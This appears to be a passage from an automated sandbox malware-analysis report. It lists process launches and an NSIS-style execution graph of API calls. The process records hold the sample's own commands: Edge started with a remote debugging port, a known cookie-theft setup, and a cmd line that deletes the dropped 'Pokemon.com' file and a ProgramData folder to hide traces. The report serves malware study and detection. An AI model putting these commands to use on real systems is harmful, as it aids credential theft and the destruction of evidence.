                                                                                                                                                                                                                                                                                    Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff6c1cf0000
                                                                                                                                                                                                                                                                                    File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                                                    Target ID:21
                                                                                                                                                                                                                                                                                    Start time:08:47:11
                                                                                                                                                                                                                                                                                    Start date:27/12/2024
                                                                                                                                                                                                                                                                                    Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2756 --field-trial-handle=2520,i,17626979648747034904,9426378667772117242,262144 /prefetch:3
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff6c1cf0000
                                                                                                                                                                                                                                                                                    File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                                                    Target ID:22
                                                                                                                                                                                                                                                                                    Start time:08:47:11
                                                                                                                                                                                                                                                                                    Start date:27/12/2024
                                                                                                                                                                                                                                                                                    Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff6c1cf0000
                                                                                                                                                                                                                                                                                    File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                                                    Target ID:23
                                                                                                                                                                                                                                                                                    Start time:08:47:11
                                                                                                                                                                                                                                                                                    Start date:27/12/2024
                                                                                                                                                                                                                                                                                    Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2860 --field-trial-handle=2116,i,16355432943838748854,2832790801878657825,262144 /prefetch:3
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff6c1cf0000
                                                                                                                                                                                                                                                                                    File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                                                    Target ID:28
                                                                                                                                                                                                                                                                                    Start time:08:47:15
                                                                                                                                                                                                                                                                                    Start date:27/12/2024
                                                                                                                                                                                                                                                                                    Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6896 --field-trial-handle=2116,i,16355432943838748854,2832790801878657825,262144 /prefetch:8
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff6c1cf0000
                                                                                                                                                                                                                                                                                    File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                                                    Target ID:29
                                                                                                                                                                                                                                                                                    Start time:08:47:15
                                                                                                                                                                                                                                                                                    Start date:27/12/2024
                                                                                                                                                                                                                                                                                    Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6980 --field-trial-handle=2116,i,16355432943838748854,2832790801878657825,262144 /prefetch:8
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff6c1cf0000
                                                                                                                                                                                                                                                                                    File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                                                    Target ID:31
                                                                                                                                                                                                                                                                                    Start time:08:47:41
                                                                                                                                                                                                                                                                                    Start date:27/12/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                    Commandline:"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\208079\Pokemon.com" & rd /s /q "C:\ProgramData\79RQ1VS0ZU3E" & exit
                                                                                                                                                                                                                                                                                    Imagebase:0x790000
                                                                                                                                                                                                                                                                                    File size:236'544 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                                                    Target ID:32
                                                                                                                                                                                                                                                                                    Start time:08:47:41
                                                                                                                                                                                                                                                                                    Start date:27/12/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                                                    Target ID:33
                                                                                                                                                                                                                                                                                    Start time:08:47:41
                                                                                                                                                                                                                                                                                    Start date:27/12/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                    Commandline:timeout /t 10
                                                                                                                                                                                                                                                                                    Imagebase:0x9c0000
                                                                                                                                                                                                                                                                                    File size:25'088 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Disassembly

                                                                                                                                                                                                                                                                                    Reset < >

                                                                                                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                                                                                                      Execution Coverage:17.5%
                                                                                                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                                      Signature Coverage:21%
                                                                                                                                                                                                                                                                                      Total number of Nodes:1482
                                                                                                                                                                                                                                                                                      Total number of Limit Nodes:25
                                                                                                                                                                                                                                                                                      execution_graph 4175 402fc0 4176 401446 18 API calls 4175->4176 4177 402fc7 4176->4177 4178 401a13 4177->4178 4179 403017 4177->4179 4180 40300a 4177->4180 4182 406831 18 API calls 4179->4182 4181 401446 18 API calls 4180->4181 4181->4178 4182->4178 4183 4023c1 4184 40145c 18 API calls 4183->4184 4185 4023c8 4184->4185 4188 407296 4185->4188 4191 406efe CreateFileW 4188->4191 4192 406f30 4191->4192 4193 406f4a ReadFile 4191->4193 4194 4062cf 11 API calls 4192->4194 4195 4023d6 4193->4195 4198 406fb0 4193->4198 4194->4195 4196 406fc7 ReadFile lstrcpynA lstrcmpA 4196->4198 4199 40700e SetFilePointer ReadFile 4196->4199 4197 40720f CloseHandle 4197->4195 4198->4195 4198->4196 4198->4197 4200 407009 4198->4200 4199->4197 4201 4070d4 ReadFile 4199->4201 4200->4197 4202 407164 4201->4202 4202->4200 4202->4201 4203 40718b SetFilePointer GlobalAlloc ReadFile 4202->4203 4204 4071eb lstrcpynW GlobalFree 4203->4204 4205 4071cf 4203->4205 4204->4197 4205->4204 4205->4205 4206 401cc3 4207 40145c 18 API calls 4206->4207 4208 401cca lstrlenW 4207->4208 4209 4030dc 4208->4209 4210 4030e3 4209->4210 4212 405f7d wsprintfW 4209->4212 4212->4210 4213 401c46 4214 40145c 18 API calls 4213->4214 4215 401c4c 4214->4215 4216 4062cf 11 API calls 4215->4216 4217 401c59 4216->4217 4218 406cc7 81 API calls 4217->4218 4219 401c64 4218->4219 4220 403049 4221 401446 18 API calls 4220->4221 4222 403050 4221->4222 4223 406831 18 API calls 4222->4223 4224 401a13 4222->4224 4223->4224 4225 40204a 4226 401446 18 API calls 4225->4226 4227 402051 IsWindow 4226->4227 4228 4018d3 4227->4228 4229 40324c 4230 403277 4229->4230 4231 40325e SetTimer 4229->4231 4232 4032cc 4230->4232 4233 403291 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4230->4233 4231->4230 4233->4232 4234 4022cc 4235 40145c 18 API calls 4234->4235 4236 4022d3 4235->4236 4237 406301 2 API calls 4236->4237 4238 4022d9 4237->4238 4240 4022e8 4238->4240 4243 405f7d wsprintfW 4238->4243 4241 4030e3 4240->4241 4244 405f7d wsprintfW 4240->4244 4243->4240 4244->4241 4245 4030cf 4246 40145c 18 API calls 4245->4246 4247 4030d6 4246->4247 4249 4030dc 4247->4249 4252 4063d8 GlobalAlloc lstrlenW 4247->4252 4250 4030e3 4249->4250 4279 405f7d wsprintfW 4249->4279 4253 406460 4252->4253 4254 40640e 4252->4254 4253->4249 4255 40643b GetVersionExW 4254->4255 4280 406057 CharUpperW 4254->4280 4255->4253 4256 40646a 4255->4256 4257 406490 LoadLibraryA 4256->4257 4258 406479 4256->4258 4257->4253 4261 4064ae GetProcAddress GetProcAddress GetProcAddress 4257->4261 4258->4253 4260 4065b1 GlobalFree 4258->4260 4262 4065c7 LoadLibraryA 4260->4262 4263 406709 FreeLibrary 4260->4263 4264 406621 4261->4264 4268 4064d6 4261->4268 4262->4253 4266 4065e1 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 4262->4266 4263->4253 4265 40667d FreeLibrary 4264->4265 4267 406656 4264->4267 4265->4267 4266->4264 4271 406716 4267->4271 4276 4066b1 lstrcmpW 4267->4276 4277 4066e2 CloseHandle 4267->4277 4278 406700 CloseHandle 4267->4278 4268->4264 4269 406516 4268->4269 4270 4064fa FreeLibrary GlobalFree 4268->4270 4269->4260 4272 406528 lstrcpyW OpenProcess 4269->4272 4274 40657b CloseHandle CharUpperW lstrcmpW 4269->4274 4270->4253 4273 40671b CloseHandle FreeLibrary 4271->4273 4272->4269 4272->4274 4275 406730 CloseHandle 4273->4275 4274->4264 4274->4269 4275->4273 4276->4267 4276->4275 4277->4267 4278->4263 4279->4250 4280->4254 4281 4044d1 4282 40450b 4281->4282 4283 40453e 4281->4283 4349 405cb0 GetDlgItemTextW 4282->4349 4284 40454b GetDlgItem GetAsyncKeyState 4283->4284 4288 4045dd 4283->4288 4286 40456a GetDlgItem 4284->4286 4299 404588 4284->4299 4291 403d6b 19 API calls 4286->4291 4287 4046c9 4347 40485f 4287->4347 4351 405cb0 GetDlgItemTextW 4287->4351 4288->4287 4296 406831 18 API calls 4288->4296 4288->4347 4289 404516 4290 406064 5 API calls 4289->4290 4292 40451c 4290->4292 4294 40457d ShowWindow 4291->4294 4295 403ea0 5 API calls 4292->4295 4294->4299 4300 404521 GetDlgItem 4295->4300 4301 40465b SHBrowseForFolderW 4296->4301 4297 4046f5 4302 4067aa 18 API calls 4297->4302 4298 403df6 8 API calls 4303 404873 4298->4303 4304 4045a5 SetWindowTextW 4299->4304 4308 405d85 4 API calls 4299->4308 4305 40452f IsDlgButtonChecked 4300->4305 4300->4347 4301->4287 4307 404673 CoTaskMemFree 4301->4307 4312 4046fb 4302->4312 4306 403d6b 19 API calls 4304->4306 4305->4283 4310 4045c3 4306->4310 4311 40674e 3 API calls 4307->4311 4309 40459b 4308->4309 4309->4304 4316 40674e 3 API calls 4309->4316 4313 403d6b 19 API calls 4310->4313 4314 404680 4311->4314 4352 406035 lstrcpynW 4312->4352 4317 4045ce 4313->4317 4318 4046b7 SetDlgItemTextW 4314->4318 4323 406831 18 API calls 4314->4323 4316->4304 4350 403dc4 SendMessageW 4317->4350 4318->4287 4319 404712 4321 406328 3 API calls 4319->4321 4330 40471a 4321->4330 4322 4045d6 4324 406328 3 API calls 4322->4324 4325 40469f lstrcmpiW 4323->4325 4324->4288 4325->4318 4328 4046b0 lstrcatW 4325->4328 4326 40475c 4353 406035 lstrcpynW 4326->4353 4328->4318 4329 404765 4331 405d85 4 API calls 4329->4331 4330->4326 4334 40677d 2 API calls 4330->4334 4336 4047b1 4330->4336 4332 40476b GetDiskFreeSpaceW 4331->4332 4335 40478f MulDiv 4332->4335 4332->4336 4334->4330 4335->4336 4337 40480e 4336->4337 4354 4043d9 4336->4354 4338 404831 4337->4338 4340 40141d 80 API calls 4337->4340 4362 403db1 KiUserCallbackDispatcher 4338->4362 4340->4338 4341 4047ff 4343 404810 SetDlgItemTextW 4341->4343 4344 404804 4341->4344 4343->4337 4346 4043d9 21 API calls 4344->4346 4345 40484d 4345->4347 4363 403d8d 4345->4363 4346->4337 4347->4298 4349->4289 4350->4322 4351->4297 4352->4319 4353->4329 4355 4043f9 4354->4355 4356 406831 18 API calls 4355->4356 4357 404439 4356->4357 4358 406831 18 API calls 4357->4358 4359 404444 4358->4359 4360 406831 18 API calls 4359->4360 4361 404454 lstrlenW wsprintfW SetDlgItemTextW 4360->4361 4361->4341 4362->4345 4364 403da0 SendMessageW 4363->4364 4365 403d9b 4363->4365 4364->4347 4365->4364 4366 401dd3 4367 401446 18 API calls 4366->4367 4368 401dda 4367->4368 4369 401446 18 API calls 4368->4369 4370 4018d3 4369->4370 4371 402e55 4372 40145c 18 API calls 4371->4372 4373 402e63 4372->4373 4374 402e79 4373->4374 4375 40145c 18 API calls 4373->4375 4376 405e5c 2 API calls 4374->4376 4375->4374 4377 402e7f 4376->4377 4401 405e7c GetFileAttributesW CreateFileW 4377->4401 4379 402e8c 4380 402f35 4379->4380 4381 402e98 GlobalAlloc 4379->4381 4384 4062cf 11 API calls 4380->4384 4382 402eb1 4381->4382 4383 402f2c CloseHandle 4381->4383 4402 403368 SetFilePointer 4382->4402 4383->4380 4386 402f45 4384->4386 4388 402f50 DeleteFileW 4386->4388 4389 402f63 4386->4389 4387 402eb7 4390 403336 ReadFile 4387->4390 4388->4389 4403 401435 4389->4403 4392 402ec0 GlobalAlloc 4390->4392 4393 402ed0 4392->4393 4394 402f04 WriteFile GlobalFree 4392->4394 4396 40337f 33 API calls 4393->4396 4395 40337f 33 API calls 4394->4395 4397 402f29 4395->4397 4400 402edd 4396->4400 4397->4383 4399 402efb GlobalFree 4399->4394 4400->4399 4401->4379 4402->4387 4404 404f9e 25 API calls 4403->4404 4405 401443 4404->4405 4406 401cd5 4407 401446 18 API calls 4406->4407 4408 401cdd 4407->4408 4409 401446 18 API calls 4408->4409 4410 401ce8 4409->4410 4411 40145c 18 API calls 4410->4411 4412 401cf1 4411->4412 4413 401d07 lstrlenW 4412->4413 4414 401d43 4412->4414 4415 401d11 4413->4415 4415->4414 4419 406035 lstrcpynW 4415->4419 4417 401d2c 4417->4414 4418 401d39 lstrlenW 4417->4418 4418->4414 4419->4417 4420 402cd7 4421 401446 18 API calls 4420->4421 4423 402c64 4421->4423 4422 402d17 ReadFile 4422->4423 4423->4420 4423->4422 4424 402d99 4423->4424 4425 402dd8 4426 4030e3 4425->4426 4427 402ddf 4425->4427 4428 402de5 FindClose 4427->4428 4428->4426 4429 401d5c 4430 40145c 18 API calls 4429->4430 4431 401d63 4430->4431 4432 40145c 18 API calls 4431->4432 4433 401d6c 4432->4433 4434 401d73 lstrcmpiW 4433->4434 4435 401d86 lstrcmpW 4433->4435 4436 401d79 4434->4436 4435->4436 4437 401c99 4435->4437 4436->4435 4436->4437 4438 4027e3 4439 4027e9 4438->4439 4440 4027f2 4439->4440 4441 402836 4439->4441 4454 401553 4440->4454 4442 40145c 18 API calls 4441->4442 4444 40283d 4442->4444 4446 4062cf 11 API calls 4444->4446 4445 4027f9 4447 40145c 18 API calls 4445->4447 4451 401a13 4445->4451 4448 40284d 4446->4448 4449 40280a RegDeleteValueW 4447->4449 4458 40149d RegOpenKeyExW 4448->4458 4450 4062cf 11 API calls 4449->4450 4453 40282a RegCloseKey 4450->4453 4453->4451 4455 401563 4454->4455 4456 40145c 18 API calls 4455->4456 4457 401589 RegOpenKeyExW 4456->4457 4457->4445 4461 4014c9 4458->4461 4466 401515 4458->4466 4459 4014ef RegEnumKeyW 4460 401501 RegCloseKey 4459->4460 4459->4461 4463 406328 3 API calls 4460->4463 4461->4459 4461->4460 4462 401526 RegCloseKey 4461->4462 4464 40149d 3 API calls 4461->4464 4462->4466 4465 401511 4463->4465 4464->4461 4465->4466 4467 401541 RegDeleteKeyW 4465->4467 4466->4451 4467->4466 4468 4040e4 4469 4040ff 4468->4469 4475 40422d 4468->4475 4471 40413a 4469->4471 4499 403ff6 WideCharToMultiByte 4469->4499 4470 404298 4472 40436a 4470->4472 4473 4042a2 GetDlgItem 4470->4473 4479 403d6b 19 API calls 4471->4479 4480 403df6 8 API calls 4472->4480 4476 40432b 4473->4476 4477 4042bc 4473->4477 4475->4470 4475->4472 4478 404267 GetDlgItem SendMessageW 4475->4478 4476->4472 4481 40433d 4476->4481 4477->4476 4485 4042e2 6 API calls 4477->4485 4504 403db1 KiUserCallbackDispatcher 4478->4504 4483 40417a 4479->4483 4484 404365 4480->4484 4486 404353 4481->4486 4487 404343 SendMessageW 4481->4487 4489 403d6b 19 API calls 4483->4489 4485->4476 4486->4484 4490 404359 SendMessageW 4486->4490 4487->4486 4488 404293 4491 403d8d SendMessageW 4488->4491 4492 404187 CheckDlgButton 4489->4492 4490->4484 4491->4470 4502 403db1 KiUserCallbackDispatcher 4492->4502 4494 4041a5 GetDlgItem 4503 403dc4 SendMessageW 4494->4503 4496 4041bb SendMessageW 4497 4041e1 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4496->4497 4498 4041d8 GetSysColor 4496->4498 4497->4484 4498->4497 4500 404033 4499->4500 4501 404015 GlobalAlloc WideCharToMultiByte 4499->4501 4500->4471 4501->4500 4502->4494 4503->4496 4504->4488 4505 402ae4 4506 402aeb 4505->4506 4507 4030e3 4505->4507 4508 402af2 CloseHandle 4506->4508 4508->4507 4509 402065 4510 401446 18 API calls 4509->4510 4511 40206d 4510->4511 4512 401446 18 API calls 4511->4512 4513 402076 GetDlgItem 4512->4513 4514 4030dc 4513->4514 4515 4030e3 4514->4515 4517 405f7d wsprintfW 4514->4517 4517->4515 4518 402665 4519 40145c 18 API calls 4518->4519 4520 40266b 4519->4520 4521 40145c 18 API calls 4520->4521 4522 402674 4521->4522 4523 40145c 18 API calls 4522->4523 4524 40267d 4523->4524 4525 4062cf 11 API calls 4524->4525 4526 40268c 4525->4526 4527 406301 2 API calls 4526->4527 4528 402695 4527->4528 4529 4026a6 lstrlenW lstrlenW 4528->4529 4531 404f9e 25 API calls 4528->4531 4533 4030e3 4528->4533 4530 404f9e 25 API calls 4529->4530 4532 4026e8 SHFileOperationW 4530->4532 4531->4528 4532->4528 4532->4533 4534 401c69 4535 40145c 18 API calls 4534->4535 4536 401c70 4535->4536 4537 4062cf 11 API calls 4536->4537 4538 401c80 4537->4538 4539 405ccc MessageBoxIndirectW 4538->4539 4540 401a13 4539->4540 4541 402f6e 4542 402f72 4541->4542 4543 402fae 4541->4543 4545 4062cf 11 API calls 4542->4545 4544 40145c 18 API calls 4543->4544 4551 402f9d 4544->4551 4546 402f7d 4545->4546 4547 4062cf 11 API calls 4546->4547 4548 402f90 4547->4548 4549 402fa2 4548->4549 4550 402f98 4548->4550 4553 406113 9 API calls 4549->4553 4552 403ea0 5 API calls 4550->4552 4552->4551 4553->4551 4554 4023f0 4555 402403 4554->4555 4556 4024da 4554->4556 4557 40145c 18 API calls 4555->4557 4558 404f9e 25 API calls 4556->4558 4559 40240a 4557->4559 4562 4024f1 4558->4562 4560 40145c 18 API calls 4559->4560 4561 402413 4560->4561 4563 402429 LoadLibraryExW 4561->4563 4564 40241b GetModuleHandleW 4561->4564 4565 4024ce 4563->4565 4566 40243e 4563->4566 4564->4563 4564->4566 4568 404f9e 25 API calls 4565->4568 4578 406391 GlobalAlloc WideCharToMultiByte 4566->4578 4568->4556 4569 402449 4570 40248c 4569->4570 4571 40244f 4569->4571 4572 404f9e 25 API calls 4570->4572 4573 401435 25 API calls 4571->4573 4576 40245f 4571->4576 4574 402496 4572->4574 4573->4576 4575 4062cf 11 API calls 4574->4575 4575->4576 4576->4562 4577 4024c0 FreeLibrary 4576->4577 4577->4562 4579 4063c9 GlobalFree 4578->4579 4580 4063bc GetProcAddress 4578->4580 4579->4569 4580->4579 3417 402175 3427 401446 3417->3427 3419 40217c 3420 401446 18 API calls 3419->3420 3421 402186 3420->3421 3422 402197 3421->3422 3425 4062cf 11 API calls 3421->3425 3423 4021aa EnableWindow 3422->3423 3424 40219f ShowWindow 3422->3424 3426 4030e3 3423->3426 3424->3426 3425->3422 3428 406831 18 API calls 3427->3428 3429 401455 3428->3429 3429->3419 4581 4048f8 4582 404906 4581->4582 4583 40491d 4581->4583 4584 40490c 4582->4584 4599 404986 4582->4599 4585 40492b IsWindowVisible 4583->4585 4591 404942 4583->4591 4586 403ddb SendMessageW 4584->4586 4588 404938 4585->4588 4585->4599 4589 404916 4586->4589 4587 40498c CallWindowProcW 4587->4589 4600 40487a SendMessageW 4588->4600 4591->4587 4605 406035 lstrcpynW 4591->4605 4593 404971 4606 405f7d wsprintfW 4593->4606 4595 404978 4596 40141d 80 API calls 4595->4596 4597 40497f 4596->4597 4607 406035 lstrcpynW 4597->4607 4599->4587 4601 4048d7 SendMessageW 4600->4601 4602 40489d GetMessagePos ScreenToClient SendMessageW 4600->4602 4604 4048cf 4601->4604 4603 4048d4 4602->4603 4602->4604 4603->4601 4604->4591 4605->4593 4606->4595 4607->4599 3722 4050f9 3723 4052c1 3722->3723 3724 40511a GetDlgItem GetDlgItem GetDlgItem 3722->3724 3725 4052f2 3723->3725 3726 4052ca GetDlgItem CreateThread CloseHandle 3723->3726 3771 403dc4 SendMessageW 3724->3771 3728 405320 3725->3728 3730 405342 3725->3730 3731 40530c ShowWindow ShowWindow 3725->3731 3726->3725 3774 405073 OleInitialize 3726->3774 3732 40537e 3728->3732 3734 405331 3728->3734 3735 405357 ShowWindow 3728->3735 3729 40518e 3741 406831 18 API calls 3729->3741 3736 403df6 8 API calls 3730->3736 3773 403dc4 SendMessageW 3731->3773 3732->3730 3737 405389 SendMessageW 3732->3737 3738 403d44 SendMessageW 3734->3738 3739 405377 3735->3739 3740 405369 3735->3740 3746 4052ba 3736->3746 3745 4053a2 CreatePopupMenu 3737->3745 3737->3746 3738->3730 3744 403d44 SendMessageW 3739->3744 3742 404f9e 25 API calls 3740->3742 3743 4051ad 3741->3743 3742->3739 3747 4062cf 11 API calls 3743->3747 3744->3732 3748 406831 18 API calls 3745->3748 3749 4051b8 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3747->3749 3750 4053b2 AppendMenuW 3748->3750 3751 405203 SendMessageW SendMessageW 3749->3751 3752 40521f 3749->3752 3753 4053c5 GetWindowRect 3750->3753 3754 4053d8 3750->3754 3751->3752 3755 405232 3752->3755 3756 405224 SendMessageW 3752->3756 3757 4053df TrackPopupMenu 3753->3757 3754->3757 3758 403d6b 19 API calls 3755->3758 3756->3755 3757->3746 3759 4053fd 3757->3759 3760 405242 3758->3760 3761 405419 SendMessageW 3759->3761 3762 40524b ShowWindow 3760->3762 3763 40527f GetDlgItem SendMessageW 3760->3763 3761->3761 3764 405436 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3761->3764 3765 405261 ShowWindow 3762->3765 3766 40526e 3762->3766 3763->3746 3767 4052a2 SendMessageW SendMessageW 3763->3767 3768 40545b SendMessageW 3764->3768 3765->3766 3772 403dc4 SendMessageW 3766->3772 3767->3746 3768->3768 3769 405486 GlobalUnlock SetClipboardData CloseClipboard 3768->3769 3769->3746 3771->3729 3772->3763 3773->3728 3775 403ddb SendMessageW 3774->3775 3779 405096 3775->3779 3776 403ddb SendMessageW 3777 4050d1 OleUninitialize 3776->3777 3778 4062cf 11 API calls 3778->3779 3779->3778 3780 40139d 80 API calls 3779->3780 3781 4050c1 3779->3781 3780->3779 3781->3776 4608 4020f9 GetDC GetDeviceCaps 4609 401446 18 API calls 4608->4609 4610 402116 MulDiv 4609->4610 4611 401446 18 API calls 4610->4611 4612 40212c 4611->4612 4613 406831 18 API calls 4612->4613 4614 402165 CreateFontIndirectW 4613->4614 4615 4030dc 4614->4615 4616 4030e3 4615->4616 4618 405f7d wsprintfW 4615->4618 4618->4616 4619 4024fb 4620 40145c 18 API calls 4619->4620 4621 402502 4620->4621 4622 40145c 18 API calls 4621->4622 4623 40250c 4622->4623 4624 40145c 18 API calls 4623->4624 4625 402515 4624->4625 4626 40145c 18 API calls 4625->4626 4627 40251f 4626->4627 4628 40145c 18 API calls 4627->4628 4629 402529 4628->4629 4630 40253d 4629->4630 4631 40145c 18 API calls 4629->4631 4632 4062cf 11 API calls 4630->4632 4631->4630 4633 40256a CoCreateInstance 4632->4633 4634 40258c 4633->4634 4635 4026fc 4637 402708 4635->4637 4638 401ee4 4635->4638 4636 406831 18 API calls 4636->4638 4638->4635 4638->4636 3782 4019fd 3783 40145c 18 API calls 3782->3783 3784 401a04 3783->3784 3787 405eab 3784->3787 3788 405eb8 GetTickCount GetTempFileNameW 3787->3788 3789 401a0b 3788->3789 3790 405eee 3788->3790 3790->3788 3790->3789 4639 4022fd 4640 40145c 18 API calls 4639->4640 4641 402304 GetFileVersionInfoSizeW 4640->4641 4642 4030e3 4641->4642 4643 40232b GlobalAlloc 4641->4643 4643->4642 4644 40233f GetFileVersionInfoW 4643->4644 4645 402350 VerQueryValueW 4644->4645 4646 402381 GlobalFree 4644->4646 4645->4646 4647 402369 4645->4647 4646->4642 4652 405f7d wsprintfW 4647->4652 4650 402375 4653 405f7d wsprintfW 4650->4653 4652->4650 4653->4646 4654 402afd 4655 40145c 18 API calls 4654->4655 4656 402b04 4655->4656 4661 405e7c GetFileAttributesW CreateFileW 4656->4661 4658 402b10 4659 4030e3 4658->4659 4662 405f7d wsprintfW 4658->4662 4661->4658 4662->4659 4663 4029ff 4664 401553 19 API calls 4663->4664 4665 402a09 4664->4665 4666 40145c 18 API calls 4665->4666 4667 402a12 4666->4667 4668 402a1f RegQueryValueExW 4667->4668 4672 401a13 4667->4672 4669 402a45 4668->4669 4670 402a3f 4668->4670 4671 4029e4 RegCloseKey 4669->4671 4669->4672 4670->4669 4674 405f7d wsprintfW 4670->4674 4671->4672 4674->4669 4675 401000 4676 401037 BeginPaint GetClientRect 4675->4676 4677 40100c DefWindowProcW 4675->4677 4679 4010fc 4676->4679 4680 401182 4677->4680 4681 401073 CreateBrushIndirect FillRect DeleteObject 4679->4681 4682 401105 4679->4682 4681->4679 4683 